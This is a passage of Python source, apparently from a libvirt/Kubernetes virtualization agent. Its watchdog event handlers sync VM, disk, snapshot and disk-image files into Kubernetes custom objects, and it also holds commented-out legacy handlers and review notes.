    """Rewrite badgerfish JSON text into Kubernetes-safe field names.

    Applies the same substitutions, in the same order, as chained
    ``str.replace`` calls: '@' and '$' markers become '_'/'text', and
    names that clash with Kubernetes conventions get underscored.
    NOTE(review): the parameter name shadows the `json` module import;
    kept as-is so keyword callers are unaffected.
    """
    replacements = (
        ('@', '_'),
        ('$', 'text'),
        ('interface', '_interface'),
        ('transient', '_transient'),
        ('nested-hv', 'nested_hv'),
        ('suspend-to-mem', 'suspend_to_mem'),
        ('suspend-to-disk', 'suspend_to_disk'),
    )
    text = json
    for old, new in replacements:
        text = text.replace(old, new)
    return text
def updateJsonRemoveLifecycle(jsondict, body):
    """Drop ``spec.lifecycle`` from a CRD dict and merge *body* into ``spec``.

    Fix: the original accessed ``jsondict['spec']`` directly and raised
    ``KeyError`` on any truthy dict lacking a 'spec' key; ``.get`` makes
    the function a no-op in that case, matching how the other falsy
    branches already behave. A falsy 'lifecycle' value is intentionally
    left in place (preserving the original truthiness check).

    Returns the (possibly mutated) *jsondict* unchanged in identity.
    """
    if jsondict:
        spec = jsondict.get('spec')
        if spec:
            if spec.get('lifecycle'):
                del spec['lifecycle']
            spec.update(body)
    return jsondict
def myVmVolEventHandler(event, pool, name, group, version, plural):
    """Sync a back-end volume event to the VM-disk custom object.

    event: "Delete", "Create" or "Modify" (any other value only refreshes
    the pool and fetches the object). pool: libvirt storage pool name.
    name: disk/volume name. group/version/plural: custom-resource coordinates.
    """
    # print(jsondict)
    if event == "Delete":
        # First push a final 'Ready' status with lifecycle removed, then
        # delete the custom object itself.
        try:
            refresh_pool(pool)
            jsondict = get_custom_object(group, version, plural, name)
            # vol_xml = get_volume_xml(pool, name)
            # vol_json = toKubeJson(xmlToJson(vol_xml))
            jsondict = updateJsonRemoveLifecycle(jsondict, {})
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            update_custom_object(group, version, plural, name, body)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM disk %s already deleted, ignore this 404 error.' % name)
            else:
                # NOTE(review): jsondict may be unbound here if
                # get_custom_object itself raised; report_failure would then
                # fail and be swallowed by the inner except.
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
        try:
            logger.debug('Delete vm disk %s, report to virtlet' % name)
            delete_custom_object(group, version, plural, name)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM disk %s already deleted, ignore this 404 error.' % name)
            else:
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
    elif event == "Create":
        try:
            logger.debug('Create vm disk %s, report to virtlet' % name)
            # Skeleton custom object; the actual volume data is merged below.
            jsondict = {'spec': {'volume': {}, 'nodeName': HOSTNAME, 'status': {}},
                        'kind': VMD_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
                        'apiVersion': '%s/%s' % (group, version)}
            # Each disk directory carries a config.json naming its pool and
            # the currently-active image file ('current').
            with open(get_pool_path(pool) + '/' + name + '/config.json', "r") as f:
                config = json.load(f)
            volume = get_vol_info_by_qemu(config['current'])
            volume["pool"] = config['pool']
            volume["poolname"] = pool
            volume["uni"] = config['current']
            volume['disk'] = name
            volume['current'] = config['current']
            vol_json = {'volume': volume}
            vol_json = add_spec_in_volume(vol_json, 'current', config['current'])
            jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            try:
                create_custom_object(group, version, plural, body)
            except ApiException as e:
                logger.error(e)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                jsondict = get_custom_object(group, version, plural, name)
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.error('Oops! ', exc_info=1)
    elif event == "Modify":
        try:
            logger.debug('Modify vm disk %s current, report to virtlet' % name)
            jsondict = get_custom_object(group, version, plural, name)
            with open(get_pool_path(pool) + '/' + name + '/config.json', "r") as f:
                config = json.load(f)
            volume = get_vol_info_by_qemu(config['current'])
            volume["pool"] = config['pool']
            volume["poolname"] = pool
            volume["uni"] = config['current']
            volume['disk'] = name
            volume['current'] = config['current']
            vol_json = {'volume': volume}
            logger.debug(config['current'])
            vol_json = add_spec_in_volume(vol_json, 'current', config['current'])
            jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            try:
                update_custom_object(group, version, plural, name, body)
            except ApiException as e:
                logger.error(e)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                jsondict = get_custom_object(group, version, plural, name)
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.error('Oops! ', exc_info=1)
    else:
        # Unknown event: refresh and fetch only. The try/except below is a
        # leftover scaffold — its body is just `pass`, so the handlers never run.
        refresh_pool(pool)
        jsondict = get_custom_object(group, version, plural, name)
        try:
            pass
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
# def myVmVolSnapshotEventHandler(event, pool, ss_path, name, group, version, plural):
# # print(jsondict)
# if event == "Delete":
# try:
# refresh_pool(pool)
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# # vol_xml = get_volume_xml(pool, name)
# # vol_json = toKubeJson(xmlToJson(vol_xml))
# jsondict = updateJsonRemoveLifecycle(jsondict, {})
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# modifyStructure(name, body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM disk %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# try:
# logger.debug('Delete vm disk snapshot %s, report to virtlet' % name)
# deleteStructure(name, V1DeleteOptions(), group, version, plural)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM disk snapshot %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# elif event == "Create":
# try:
# logger.debug('Create vm disk snapshot %s, report to virtlet' % name)
# jsondict = {'spec': {'volume': {}, 'nodeName': HOSTNAME, 'status': {}},
# 'kind': VMDSN_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
# 'apiVersion': '%s/%s' % (group, version)}
#
# volume = get_vol_info_by_qemu(ss_path)
# volume["poolname"] = pool
# volume["uni"] = ss_path
# volume['disk'] = name
# volume['current'] = ss_path
# vol_json = {'volume': volume}
# current = DiskImageHelper.get_backing_file(ss_path)
# vol_json = add_spec_in_volume(vol_json, 'current', current)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# try:
# createStructure(body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Conflict':
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# modifyStructure(name, body, group, version, plural)
# else:
# logger.error(e)
#
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.error('Oops! ', exc_info=1)
# elif event == "Modify":
# try:
# logger.debug('Modify vm disk snapshot %s current, report to virtlet' % name)
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# volume = get_vol_info_by_qemu(ss_path)
# volume["poolname"] = pool
# volume["uni"] = ss_path
# volume['disk'] = name
# volume['current'] = ss_path
# vol_json = {'volume': volume}
# current = DiskImageHelper.get_backing_file(ss_path)
# vol_json = add_spec_in_volume(vol_json, 'current', current)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# try:
# modifyStructure(name, body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Conflict':
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# modifyStructure(name, body, group, version, plural)
# else:
# logger.error(e)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.error('Oops! ', exc_info=1)
# else:
# refresh_pool(pool)
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# try:
# pass
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
class VmVolEventHandler(FileSystemEventHandler):
    """Watchdog handler for filesystem activity under a storage pool.

    Reporting to the custom-object API (via myVmVolEventHandler) is
    currently disabled in every callback; the handler only logs events.
    """

    def __init__(self, pool, target, group, version, plural):
        FileSystemEventHandler.__init__(self)
        self.pool = pool
        self.target = target
        self.group = group
        self.version = version
        self.plural = plural

    def on_moved(self, event):
        if event.is_directory:
            message = "directory moved from {0} to {1}".format(event.src_path, event.dest_path)
        else:
            message = "file moved from {0} to {1}".format(event.src_path, event.dest_path)
        logger.debug(message)

    def on_created(self, event):
        # NOTE: 'Create' reporting on config.json is intentionally disabled.
        if event.is_directory:
            message = "directory created:{0}".format(event.src_path)
        else:
            message = "file created:{0}".format(event.src_path)
        logger.debug(message)

    def on_deleted(self, event):
        # NOTE: 'Delete' reporting on config.json is intentionally disabled.
        if event.is_directory:
            message = "directory deleted:{0}".format(event.src_path)
        else:
            message = "file deleted:{0}".format(event.src_path)
        logger.debug(message)

    def on_modified(self, event):
        # Only directory modifications are logged; file-level modify events
        # (including config.json changes) are deliberately ignored here.
        if event.is_directory:
            logger.debug("directory modified:{0}".format(event.src_path))
def myVmSnapshotEventHandler(event, vm, name, group, version, plural):
    """Sync a back-end snapshot event to the VM-snapshot custom object.

    event: "Delete" or "Create" (any other value only fetches the object).
    vm: domain the snapshot belongs to. name: snapshot name.
    group/version/plural: custom-resource coordinates.
    """
    # print(jsondict)
    if event == "Delete":
        # First push a final 'Ready' status with lifecycle removed, then
        # delete the custom object itself.
        try:
            jsondict = get_custom_object(group, version, plural, name)
            # snap_xml = get_snapshot_xml(vm, name)
            # snap_json = toKubeJson(xmlToJson(snap_xml))
            # snap_json = updateDomainSnapshot(loads(snap_json))
            jsondict = updateJsonRemoveLifecycle(jsondict, {})
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            update_custom_object(group, version, plural, name, body)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM snapshot %s already deleted, ignore this 404 error.' % name)
            else:
                # NOTE(review): jsondict may be unbound here if
                # get_custom_object itself raised.
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
        try:
            logger.debug('Delete vm snapshot %s, report to virtlet' % name)
            delete_custom_object(group, version, plural, name)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM snapshot %s already deleted, ignore this 404 error.' % name)
            else:
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
    elif event == "Create":
        try:
            logger.debug('Create vm snapshot %s, report to virtlet' % name)
            # Skeleton custom object; the snapshot definition is merged below.
            jsondict = {'spec': {'domainsnapshot': {}, 'nodeName': HOSTNAME, 'status': {}},
                        'kind': VMSN_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
                        'apiVersion': '%s/%s' % (group, version)}
            # Convert the libvirt snapshot XML into the CRD's JSON structure.
            snap_xml = get_snapshot_xml(vm, name)
            snap_json = toKubeJson(xmlToJson(snap_xml))
            snap_json = updateDomainSnapshot(loads(snap_json))
            jsondict = updateJsonRemoveLifecycle(jsondict, snap_json)
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            try:
                create_custom_object(group, version, plural, body)
            except ApiException as e:
                logger.error(e)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                jsondict = get_custom_object(group, version, plural, name)
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.error('Oops! ', exc_info=1)
    else:
        # Unknown event: fetch only; report a failure if even that breaks.
        try:
            jsondict = get_custom_object(group, version, plural, name)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
class VmSnapshotEventHandler(FileSystemEventHandler):
    """Watches the snapshot directory tree and mirrors snapshot XML files
    into custom objects via myVmSnapshotEventHandler.

    Expected layout (from the path handling): <...>/<vm>/<snapshot>.xml.
    """

    def __init__(self, field, target, group, version, plural):
        FileSystemEventHandler.__init__(self)
        self.field = field
        self.target = target
        self.group = group
        self.version = version
        self.plural = plural

    def _report(self, action, path):
        # Derive (vm, snapshot) from a snapshot XML path and forward the
        # event; non-XML files are ignored.
        parent_dir, leaf = os.path.split(path)
        domain = os.path.split(parent_dir)[1]
        snap_name, ext = os.path.splitext(leaf)
        if ext != '.xml':
            return
        try:
            myVmSnapshotEventHandler(action, domain, snap_name, self.group, self.version, self.plural)
        except ApiException:
            logger.error('Oops! ', exc_info=1)

    def on_moved(self, event):
        if event.is_directory:
            logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
            return
        logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
        # A file renamed into place counts as snapshot creation.
        self._report('Create', event.dest_path)

    def on_created(self, event):
        # NOTE: reporting on raw file creation is disabled; creation is
        # picked up by on_moved instead.
        if event.is_directory:
            logger.debug("directory created:{0}".format(event.src_path))
        else:
            logger.debug("file created:{0}".format(event.src_path))

    def on_deleted(self, event):
        if event.is_directory:
            logger.debug("directory deleted:{0}".format(event.src_path))
            return
        logger.debug("file deleted:{0}".format(event.src_path))
        self._report('Delete', event.src_path)

    def on_modified(self, event):
        if event.is_directory:
            logger.debug("directory modified:{0}".format(event.src_path))
        else:
            logger.debug("file modified:{0}".format(event.src_path))
# def myVmBlockDevEventHandler(event, name, group, version, plural):
# # print(jsondict)
# if event == "Delete":
# try:
# jsondict = get_custom_object(group, version, plural, name)
# # block_json = get_block_dev_json(name)
# jsondict = updateJsonRemoveLifecycle(jsondict, {})
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# update_custom_object(group, version, plural, name, body)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM block device %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# try:
# logger.debug('Delete vm block %s, report to virtlet' % name)
# delete_custom_object(group, version, plural, name)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM block %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# elif event == "Create":
# try:
# logger.debug('Create vm block %s, report to virtlet' % name)
# jsondict = {'spec': {'REPLACE': {}, 'nodeName': HOSTNAME, 'status': {}},
# 'kind': VMDEV_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
# 'apiVersion': '%s/%s' % (group, version)}
# block_json = get_block_dev_json(name)
# jsondict = updateJsonRemoveLifecycle(jsondict, loads(block_json))
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# try:
# create_custom_object(group, version, plural, body)
# except ApiException as e:
# logger.error(e)
#
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# jsondict = get_custom_object(group, version, plural, name)
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.error('Oops! ', exc_info=1)
# else:
# try:
# jsondict = get_custom_object(group, version, plural, name)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
#
#
# class VmBlockDevEventHandler(FileSystemEventHandler):
# def __init__(self, field, target, group, version, plural):
# FileSystemEventHandler.__init__(self)
# self.field = field
# self.target = target
# self.group = group
# self.version = version
# self.plural = plural
#
# def on_moved(self, event):
# if event.is_directory:
# logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
# else:
# logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
#
# def on_created(self, event):
# if event.is_directory:
# logger.debug("directory created:{0}".format(event.src_path))
# else:
# logger.debug("file created:{0}".format(event.src_path))
# path, block = os.path.split(event.src_path)
# if is_block_dev_exists(event.src_path) and path != "/dev/mapper":
# try:
# myVmBlockDevEventHandler('Create', block, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
#
# def on_deleted(self, event):
# if event.is_directory:
# logger.debug("directory deleted:{0}".format(event.src_path))
# else:
# logger.debug("file deleted:{0}".format(event.src_path))
# path, block = os.path.split(event.src_path)
# # if is_block_dev_exists(event.src_path):
# if path == '/dev/pts':
# logger.debug('Ignore devices %s' % event.src_path)
# else:
# try:
# myVmBlockDevEventHandler('Delete', block, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
#
# def on_modified(self, event):
# if event.is_directory:
# # logger.debug("directory modified:{0}".format(event.src_path))
# pass
# else:
# # logger.debug("file modified:{0}".format(event.src_path))
# pass
def _solve_conflict_in_VM(name, group, version, plural):
    """Resolve a 409 Conflict when creating a VM custom object.

    Re-reads the existing object, stamps this node as its owner, merges the
    live libvirt domain definition into it, and updates it — retrying up to
    five times and re-raising the last error if all attempts fail.

    Fix over the original: the merged result of
    updateDomainStructureAndDeleteLifecycleInJson() was assigned to `body`
    and immediately clobbered by `body = addNodeName(jsondict)`, which only
    worked because the helper mutates `jsondict` in place. The calls are now
    chained explicitly, matching the "Create" path of
    myVmLibvirtXmlEventHandler.
    """
    max_attempts = 5
    for attempt in range(1, max_attempts + 1):
        try:
            jsondict = get_custom_object(group, version, plural, name)
            # Claim ownership for this host before pushing the update.
            jsondict['metadata']['labels']['host'] = HOSTNAME
            vm_xml = get_xml(name)
            vm_json = toKubeJson(xmlToJson(vm_xml))
            vm_json = updateDomain(loads(vm_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
            body = addNodeName(jsondict)
            update_custom_object(group, version, plural, name, body)
            return
        except Exception as e:
            if attempt == max_attempts:
                raise e
def myVmLibvirtXmlEventHandler(event, name, xml_path, group, version, plural):
    """Sync a libvirt domain-XML file event to the VM custom object.

    event: "Create", "Modify" or "Delete". name: domain name. xml_path: the
    triggering file path (not read by Create/Modify, which fetch the live
    definition via get_xml). group/version/plural: custom-resource
    coordinates.
    """
    # print(jsondict)
    if event == "Create":
        try:
            logger.debug('***Create VM %s from back-end, report to virtlet***' % name)
            # Skeleton custom object; the domain definition is merged below.
            jsondict = {'spec': {'domain': {}, 'nodeName': HOSTNAME, 'status': {}},
                        'kind': VM_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
                        'apiVersion': '%s/%s' % (group, version)}
            vm_xml = get_xml(name)
            vm_power_state = vm_state(name).get(name)
            vm_json = toKubeJson(xmlToJson(vm_xml))
            vm_json = updateDomain(loads(vm_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
            jsondict = addPowerStatusMessage(jsondict, vm_power_state, 'The VM is %s' % vm_power_state)
            body = addNodeName(jsondict)
            try:
                create_custom_object(group, version, plural, body)
            except ApiException as e:
                if e.reason == 'Conflict':
                    # Object already exists: fall back to updating it.
                    _solve_conflict_in_VM(name, group, version, plural)
                else:
                    logger.error(e)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                jsondict = get_custom_object(group, version, plural, name)
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.error('Oops! ', exc_info=1)
    elif event == "Modify":
        # NOTE(review): this fetch is outside the try below, so an
        # ApiException here (e.g. a 404) propagates to the caller.
        jsondict = get_custom_object(group, version, plural, name)
        try:
            if jsondict['metadata']['labels']['host'] != HOSTNAME:
                # Another node owns this VM (the log calls it migrating).
                logger.debug('VM %s is migrating, ignore modify.' % name)
                return
            logger.debug('***Modify VM %s from back-end, report to virtlet***' % name)
            vm_xml = get_xml(name)
            vm_json = toKubeJson(xmlToJson(vm_xml))
            vm_json = updateDomain(loads(vm_json))
            body = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
            update_custom_object(group, version, plural, name, body)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
    elif event == "Delete":
        # Deleting the on-disk XML is deliberately NOT propagated to the
        # custom object. The removed (previously commented-out) logic here
        # used to update/delete the object but skipped hosts that did not
        # own the VM ("migrating or ha"); now the event is only logged.
        logger.debug('***Delete VM %s, ignore it***' % name)
class VmLibvirtXmlEventHandler(FileSystemEventHandler):
    """Watches the libvirt domain-XML directory and mirrors VM definitions
    into custom objects via myVmLibvirtXmlEventHandler."""

    def __init__(self, field, target, group, version, plural):
        FileSystemEventHandler.__init__(self)
        self.field = field
        self.target = target
        self.group = group
        self.version = version
        self.plural = plural

    @staticmethod
    def _vm_from(path):
        # "<dir>/<vm>.xml" -> ("<vm>", ".xml")
        return os.path.splitext(os.path.split(path)[1])

    def on_moved(self, event):
        if event.is_directory:
            logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
            return
        logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
        domain, ext = self._vm_from(event.dest_path)
        # Only report once libvirt actually knows the domain.
        if ext == '.xml' and is_vm_exists(domain):
            try:
                myVmLibvirtXmlEventHandler('Create', domain, event.dest_path, self.group, self.version, self.plural)
            except ApiException:
                logger.error('Oops! ', exc_info=1)

    def on_created(self, event):
        # NOTE: reporting on raw file creation is disabled; creation is
        # picked up by on_moved instead.
        if event.is_directory:
            logger.debug("directory created:{0}".format(event.src_path))
        else:
            logger.debug("file created:{0}".format(event.src_path))

    def on_deleted(self, event):
        if event.is_directory:
            logger.debug("directory deleted:{0}".format(event.src_path))
            return
        logger.debug("file deleted:{0}".format(event.src_path))
        domain, ext = self._vm_from(event.src_path)
        # Only report when the domain is really gone from libvirt.
        if ext == '.xml' and not is_vm_exists(domain):
            try:
                myVmLibvirtXmlEventHandler('Delete', domain, event.src_path, self.group, self.version, self.plural)
            except ApiException:
                logger.error('Oops! ', exc_info=1)

    def on_modified(self, event):
        if event.is_directory:
            # logger.debug("directory modified:{0}".format(event.src_path))
            return
        logger.debug("file modified:{0}".format(event.src_path))
        domain, ext = self._vm_from(event.src_path)
        if ext == '.xml' and is_vm_exists(domain):
            try:
                myVmLibvirtXmlEventHandler('Modify', domain, event.src_path, self.group, self.version, self.plural)
            except ApiException:
                logger.error('Oops! ', exc_info=1)
def myVmdImageLibvirtXmlEventHandler(event, name, pool, xml_path, group, version, plural):
    """Sync a disk-image file event to the VM-disk-image custom object.

    event: "Create" or "Delete" (anything else is a no-op). name: image
    (volume) name. pool: libvirt storage pool holding the image. xml_path:
    triggering file path (not read here — the volume XML is fetched from
    libvirt). group/version/plural: custom-resource coordinates.
    """
    # print(jsondict)
    if event == "Create":
        try:
            '''
            Refresh pool manually
            '''
            refresh_pool(pool)
            logger.debug('Create vm disk image %s, report to virtlet' % name)
            # Skeleton custom object; the volume definition is merged below.
            jsondict = {'spec': {'volume': {}, 'nodeName': HOSTNAME, 'status': {}},
                        'kind': VMDI_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
                        'apiVersion': '%s/%s' % (group, version)}
            vmd_xml = get_volume_xml(pool, name)
            vol_path = get_volume_path(pool, name)
            vmd_json = toKubeJson(xmlToJson(vmd_xml))
            vmd_json = addSnapshots(vol_path, loads(vmd_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vmd_json)
            jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            body = addNodeName(jsondict)
            try:
                create_custom_object(group, version, plural, body)
            except ApiException as e:
                logger.error(e)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                jsondict = get_custom_object(group, version, plural, name)
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.error('Oops! ', exc_info=1)
    elif event == "Delete":
        # First push a final 'Ready' status with lifecycle removed, then
        # delete the custom object itself.
        try:
            '''
            Refresh pool manually
            '''
            refresh_pool(pool)
            jsondict = get_custom_object(group, version, plural, name)
            # with open(xml_path, 'r') as fr:
            #     vm_xml = fr.read()
            # vmd_json = toKubeJson(xmlToJson(vm_xml))
            # vmd_json = updateDomain(loads(vmd_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, {})
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            update_custom_object(group, version, plural, name, body)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM disk image %s already deleted, ignore this 404 error.' % name)
            else:
                # NOTE(review): jsondict may be unbound here if
                # get_custom_object itself raised.
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
        try:
            logger.debug('Delete vm disk image %s, report to virtlet' % name)
            delete_custom_object(group, version, plural, name)
            # jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vmd_json)
            # body = addExceptionMessage(jsondict, 'VirtletError', 'VM has been deleted in back-end.')
            # modifyStructure(name, body, group, version, plural)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM disk image %s already deleted, ignore this 404 error.' % name)
            else:
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
class VmdImageLibvirtXmlEventHandler(FileSystemEventHandler):
    """Watches a disk-image directory and mirrors image files into
    custom objects via myVmdImageLibvirtXmlEventHandler."""

    def __init__(self, pool, target, group, version, plural):
        FileSystemEventHandler.__init__(self)
        self.pool = pool
        self.target = target
        self.group = group
        self.version = version
        self.plural = plural

    def _forward(self, action, image_name, xml_path):
